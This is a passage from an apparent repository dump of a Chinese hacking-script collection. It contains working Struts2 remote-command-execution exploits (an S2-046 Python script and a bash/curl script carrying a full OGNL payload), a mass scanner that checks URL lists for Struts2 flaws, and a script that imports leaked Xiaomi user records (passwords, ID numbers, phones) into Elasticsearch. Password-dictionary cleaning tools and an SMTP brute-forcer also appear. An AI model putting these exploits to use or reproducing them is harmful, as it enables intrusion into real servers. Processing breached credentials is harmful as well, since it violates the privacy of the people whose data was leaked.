vulnerability exits s2-%s!" % (l.strip(),types), 27 | return true 28 | else: 29 | print "\n[-]%s Not s2-%s vulnerability" % (url,types), 30 | return False 31 | except: 32 | print "\n[-]%s timeout" % url, 33 | return False 34 | 35 | if __name__ == "__main__": 36 | if len(sys.argv) < 2: 37 | print "Example: python exp.py list.txt" 38 | exit() 39 | weblist = sys.argv[1] 40 | f = open(weblist) 41 | for l in f.readlines(): 42 | url = l.strip() 43 | s2exp(url,"032") 44 | s2exp(url,"016") 45 | s2exp(url,"019") 46 | s2exp(url,"s2_devmode") -------------------------------------------------------------------------------- /sgk数据清洗/BigDupRemove.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/sgk数据清洗/BigDupRemove.zip -------------------------------------------------------------------------------- /sgk数据清洗/es_import-master/.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *,cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask stuff: 57 | instance/ 58 | .webassets-cache 59 | 60 | # Scrapy stuff: 61 | .scrapy 62 | 63 | # Sphinx documentation 64 | docs/_build/ 65 | 66 | # PyBuilder 67 | target/ 68 | 69 | # IPython Notebook 70 | .ipynb_checkpoints 71 | 72 | # pyenv 73 | .python-version 74 | 75 | # celery beat schedule file 76 | celerybeat-schedule 77 | 78 | # dotenv 79 | .env 80 | 81 | # virtualenv 82 | venv/ 83 | ENV/ 84 | 85 | # Spyder project settings 86 | .spyderproject 87 | 88 | # Rope project settings 89 | .ropeproject 90 | -------------------------------------------------------------------------------- /sgk数据清洗/es_import-master/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 vermouth 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /sgk数据清洗/es_import-master/README.md: -------------------------------------------------------------------------------- 1 | # es_import 2 | 社工库信息(csv,excel,sql)导入es 3 | -------------------------------------------------------------------------------- /sgk数据清洗/es_import-master/es_import.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | from elasticsearch import Elasticsearch 3 | from elasticsearch import helpers 4 | import csv 5 | import traceback 6 | 7 | 8 | def csv_import(): 9 | try: 10 | es = Elasticsearch() 11 | actions = [] 12 | i = 1 13 | with open('xiaomi_com.csv') as reader: 14 | for line in reader: 15 | action = { 16 | "_index": "xiaomi_", 17 | "_type": "xiaomi_user", 18 | "_id": i, 19 | "_source": { 20 | u"id": line[0].decode('utf8'), 21 | u"账户名": line[1].decode('utf8'), 22 | u"密码": line[2].decode('utf8'), 23 | u"email": line[3].decode('utf8'), 24 | u"ip地址": line[4].decode('utf8'), 25 | u"号码": line[5].decode('utf8'), 26 | u"身份证号": line[6].decode('utf8'), 27 | u"年龄": line[7].decode('utf8'), 28 | u"月份": line[8].decode('utf8'), 29 | u"年份": line[9].decode('utf8'), 30 | u"姓氏": line[10].decode('utf8') 31 | } 32 | } 33 | i += 1 34 | actions.append(action) 35 | if len(actions) == 500: 36 | helpers.bulk(es, actions) 37 | del actions[0:len(actions)] 38 | if len(actions) > 0: 39 | helpers.bulk(es, actions) 40 | except: 41 | traceback.print_exc() 42 | 43 | 44 | if __name__ == '__main__': 45 | csv_import() -------------------------------------------------------------------------------- /sgk数据清洗/quchong.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | 3 | import sys, re, os 4 | 5 | def getDictList(dict): 6 | regx = '''[\w\~`\!\@\#\$\%\^\&\*\(\)\_\-\+\=\[\]\{\}\:\;\,\.\/\<\>\?]+''' 7 | with open(dict) as f: 8 | data = f.read() 9 | return re.findall(regx, data) 10 | 11 | def rmdp(dictList): 12 | return list(set(dictList)) 13 | 14 | def fileSave(dictRmdp, out): 15 | with open(out, 'a') as f: 16 | for line in dictRmdp: 17 | f.write(line + '\n') 18 | 19 | def main(): 20 | try: 21 | dict = sys.argv[1].strip() 22 | out = sys.argv[2].strip() 23 | except Exception, e: 24 | print 'error:', e 25 | me = os.path.basename(__file__) 26 | print 'usage: %s ' %me 27 | print 'example: %s dict.txt dict_rmdp.txt' %me 28 | exit() 29 | 30 | dictList = getDictList(dict) 31 | dictRmdp = rmdp(dictList) 32 | fileSave(dictRmdp, out) 33 | 34 | if __name__ == '__main__': 35 | main() -------------------------------------------------------------------------------- /sgk数据清洗/去重.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | #�ֵ�ȥ��С���� 5 | import sys 6 | import os 7 | import platform 8 | try: 9 | pass 10 | except: 11 | print '''you have something wrong this is a simple jiaoben ''' 12 | sys.exit() 13 | 14 | 15 | why = 'why.txt' 16 | for i in xrange(len(sys.argv)): 17 | if(i>=1): 18 | other = sys.argv[i] 19 | if os.path.exists(other): 20 | pass 21 | else: 22 | print other + ' file not find' 23 | sys.exit() 24 | if 'Windows' in platform.system(): 25 | os.system("type "+other+" >> "+why) 26 | else: 27 | os.system("cat "+other+" >> "+why) 28 | 29 | yuan = open('duowan_user.txt','r') 30 | dirc = open('whynot.txt','w') 31 | for line in set(yuan.readlines()): 32 | if line == '' or line == '\r\n': 33 | pass 34 | else: 35 | dirc.writelines(line) -------------------------------------------------------------------------------- /sgk数据清洗/去重可排序.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # Author: Forsaken 4 | 5 | import getopt 6 | import os 7 | import sys 8 | 9 | def main(): 10 | try: 11 | opts, args = getopt.getopt(sys.argv[1:], 'hf:s', ['help', 'file=', 'sort']) 12 | except getopt.GetoptError as e: 13 | print('[-] %s' % e) 14 | usage() 15 | sys.exit(2) 16 | 17 | file = '' 18 | sort = False 19 | 20 | for o, a in opts: 21 | if o in ('-h', '--help'): 22 | usage() 23 | sys.exit() 24 | elif o in ('-f', '--file'): 25 | file = a 26 | elif o in ('-s', '--sort'): 27 | sort = True 28 | else: 29 | pass 30 | 31 | if not file: 32 | print('[-] File Arguments Not Found!') 33 | usage() 34 | sys.exit(2) 35 | 36 | if not os.path.exists(file): 37 | print('[-] File Not Found!') 38 | sys.exit(1) 39 | 40 | with open(file, 'r') as f: 41 | old = f.readlines() 42 | 43 | old_len = len(old) 44 | new = list() 45 | for o in old: 46 | if not o in new: 47 | new.append(o) 48 | new_len = len(new) 49 | delete = old_len - new_len 50 | 51 | if sort: 52 | new.sort() 53 | 54 | out = 'new_' + file 55 | with open(out, 'w') as f: 56 | f.writelines(new) 57 | 58 | print('Delete %s Line' % delete) 59 | print('Please Check %s' % out) 60 | 61 | def usage(): 62 | print('Usage: python %s [options]' % sys.argv[0]) 63 | print('') 64 | print('Options:') 65 | print(' -h, --help Show Help Message And Exit') 66 | print(' -f FILE, --file=FILE File') 67 | print(' -s, --sort Sort') 68 | 69 | if __name__ == '__main__': 70 | main() -------------------------------------------------------------------------------- /sgk数据清洗/文本去重.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/sgk数据清洗/文本去重.py -------------------------------------------------------------------------------- /sgk数据清洗/文本去重工具.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/sgk数据清洗/文本去重工具.exe -------------------------------------------------------------------------------- /smtp爆破脚本.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/smtp爆破脚本.py -------------------------------------------------------------------------------- /struts2/St2关键词.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/St2关键词.txt -------------------------------------------------------------------------------- /struts2/Struts2多版本一次性检测工具V3.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/Struts2多版本一次性检测工具V3.0.jar -------------------------------------------------------------------------------- /struts2/s02-46命令执行支持ssl_python源码.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | # encoding:utf-8 3 | # s02-46_ssl.py https://127.0.0.1/viewDetail.action "whoami"|more 4 | # 作者:pt007@vip.sina.com 5 | import urllib2,sys,getopt,ssl 6 | from poster.encode import multipart_encode 7 | from poster.streaminghttp import register_openers 8 | 9 | ssl._create_default_https_context = ssl._create_unverified_context 10 | type = sys.getfilesystemencoding() 11 | reload(sys) 12 | sys.setdefaultencoding(type) 13 | 14 | def poc(command): 15 | cmd1=command 16 | #print "cmd1=%s\n" %cmd1 17 | user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36" 18 | #accept=" application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*" 19 | #length="10000000" 20 | type="multipart/form-data; boundary=---------------------------735323031399963166993862150" 21 | #data=data+'''Content-Disposition: form-data; name="upload";filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','Kaboom')}"''' 22 | data="-----------------------------735323031399963166993862150\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+command+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n-----------------------------735323031399963166993862150--\r\n\r\n" 23 | 24 | #print "data="+data 25 | url=str(sys.argv[1]) 26 | try: 27 | #代理配置 28 | #proxy_handler=urllib2.ProxyHandler({'http':'http://127.0.0.1:8081', 'https':'https:// username:password @proxyhk.huawei.com:8080'}) 29 | #opener=urllib2.build_opener(proxy_handler) 30 | 31 | opener = urllib2.build_opener() 32 | urllib2.install_opener(opener) 33 | req = urllib2.Request(url) 34 | req.add_header('Content-Type',type) 35 | req.add_header('User-Agent',user_agent) 36 | #req.add_header('Accept',accept) 37 | #req.add_header('Content-Length',length) 38 | res=opener.open(req,data) 39 | response=res.read() 40 | print response.strip() 41 | except urllib2.URLError,e: 42 | print "Exploit Fail:%s" %e 43 | 44 | try: 45 | poc(str(sys.argv[2])) 46 | except Exception,e: 47 | print e 48 | exit(-1) -------------------------------------------------------------------------------- /struts2/s2-045 POC/HttpCodeLib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-045 POC/HttpCodeLib.dll -------------------------------------------------------------------------------- /struts2/s2-046.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | url=$1 4 | cmd=$2 5 | shift 6 | shift 7 | 8 | boundary="---------------------------735323031399963166993862150" 9 | content_type="multipart/form-data; boundary=$boundary" 10 | echo $content_type 11 | payload=$(echo "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}") 12 | 13 | printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@ 14 | ~ 15 | ~ 16 | -- 可视 -- 13 1,2 全部 -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.40629.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "s2-045", "s2-045\s2-045.csproj", "{B5458322-F240-4963-B4AD-35EC1F5EED1A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {B5458322-F240-4963-B4AD-35EC1F5EED1A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {B5458322-F240-4963-B4AD-35EC1F5EED1A}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {B5458322-F240-4963-B4AD-35EC1F5EED1A}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {B5458322-F240-4963-B4AD-35EC1F5EED1A}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045.v12.suo -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Windows.Forms; 5 | 6 | namespace s2_045 7 | { 8 | static class Program 9 | { 10 | /// 11 | /// 应用程序的主入口点。 12 | /// 13 | [STAThread] 14 | static void Main() 15 | { 16 | Application.EnableVisualStyles(); 17 | Application.SetCompatibleTextRenderingDefault(false); 18 | Application.Run(new Form1()); 19 | } 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的常规信息通过以下 6 | // 特性集控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("s2-045")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("s2-045")] 13 | [assembly: AssemblyCopyright("Copyright © 2017")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 使此程序集中的类型 18 | // 对 COM 组件不可见。 如果需要从 COM 访问此程序集中的类型, 19 | // 则将该类型上的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("4863ae9c-b183-4a84-bda7-976ddfa5af8a")] 24 | 25 | // 程序集的版本信息由下面四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | // 可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值, 33 | // 方法是按如下所示使用“*”: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // 此代码由工具生成。 4 | // 运行时版本: 4.0.30319.42000 5 | // 6 | // 对此文件的更改可能会导致不正确的行为,并且如果 7 | // 重新生成代码,这些更改将丢失。 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace s2_045.Properties 12 | { 13 | 14 | 15 | /// 16 | /// 一个强类型的资源类,用于查找本地化的字符串等。 17 | /// 18 | // 此类是由 StronglyTypedResourceBuilder 19 | // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。 20 | // 若要添加或移除成员,请编辑 .ResX 文件,然后重新运行 ResGen 21 | // (以 /str 作为命令选项),或重新生成 VS 项目。 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources 26 | { 27 | 28 | private static global::System.Resources.ResourceManager resourceMan; 29 | 30 | private static global::System.Globalization.CultureInfo resourceCulture; 31 | 32 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 33 | internal Resources() 34 | { 35 | } 36 | 37 | /// 38 | /// 返回此类使用的、缓存的 ResourceManager 实例。 39 | /// 40 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 41 | internal static global::System.Resources.ResourceManager ResourceManager 42 | { 43 | get 44 | { 45 | if ((resourceMan == null)) 46 | { 47 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("s2_045.Properties.Resources", typeof(Resources).Assembly); 48 | resourceMan = temp; 49 | } 50 | return resourceMan; 51 | } 52 | } 53 | 54 | /// 55 | /// 为所有资源查找重写当前线程的 CurrentUICulture 属性, 56 | /// 方法是使用此强类型资源类。 57 | /// 58 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 59 | internal static global::System.Globalization.CultureInfo Culture 60 | { 61 | get 62 | { 63 | return resourceCulture; 64 | } 65 | set 66 | { 67 | resourceCulture = value; 68 | } 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace s2_045.Properties 12 | { 13 | 14 | 15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 18 | { 19 | 20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 21 | 22 | public static Settings Default 23 | { 24 | get 25 | { 26 | return defaultInstance; 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | D:\C#代码\s2-045\s2-045\obj\Debug\s2-045.csprojResolveAssemblyReference.cache 2 | D:\C#代码\s2-045\s2-045\obj\Debug\s2_045.Form1.resources 3 | D:\C#代码\s2-045\s2-045\obj\Debug\s2_045.Properties.Resources.resources 4 | D:\C#代码\s2-045\s2-045\obj\Debug\s2-045.csproj.GenerateResource.Cache 5 | D:\C#代码\s2-045\s2-045\bin\Debug\s2-045.exe 6 | D:\C#代码\s2-045\s2-045\bin\Debug\s2-045.pdb 7 | D:\C#代码\s2-045\s2-045\bin\Debug\HttpHelper.dll 8 | D:\C#代码\s2-045\s2-045\bin\Debug\HttpHelper.xml 9 | D:\C#代码\s2-045\s2-045\obj\Debug\s2-045.exe 10 | D:\C#代码\s2-045\s2-045\obj\Debug\s2-045.pdb 11 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2-045.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2-045.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2-045.exe -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2-045.pdb -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2_045.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2_045.Form1.resources -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2_045.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2_045.Properties.Resources.resources -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | D:\C#代码\s2-045\s2-045\bin\Release\s2-045.exe 2 | D:\C#代码\s2-045\s2-045\bin\Release\s2-045.pdb 3 | D:\C#代码\s2-045\s2-045\bin\Release\HttpHelper.dll 4 | D:\C#代码\s2-045\s2-045\bin\Release\HttpHelper.xml 5 | D:\C#代码\s2-045\s2-045\obj\Release\s2_045.Form1.resources 6 | D:\C#代码\s2-045\s2-045\obj\Release\s2_045.Properties.Resources.resources 7 | D:\C#代码\s2-045\s2-045\obj\Release\s2-045.csproj.GenerateResource.Cache 8 | D:\C#代码\s2-045\s2-045\obj\Release\s2-045.exe 9 | D:\C#代码\s2-045\s2-045\obj\Release\s2-045.pdb 10 | D:\C#代码\s2-045\s2-045\obj\Release\s2-045.csprojResolveAssemblyReference.cache 11 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2-045.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2-045.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2-045.exe -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2-045.pdb -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2_045.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2_045.Form1.resources -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2_045.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2_045.Properties.Resources.resources -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/s2-045.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {B5458322-F240-4963-B4AD-35EC1F5EED1A} 8 | WinExe 9 | Properties 10 | s2_045 11 | s2-045 12 | v4.0 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | ..\..\..\移动\苏飞开发助手V1.0正式版\HttpHelper万能框架V1.9.0.6-DLL\HttpHelper.dll 37 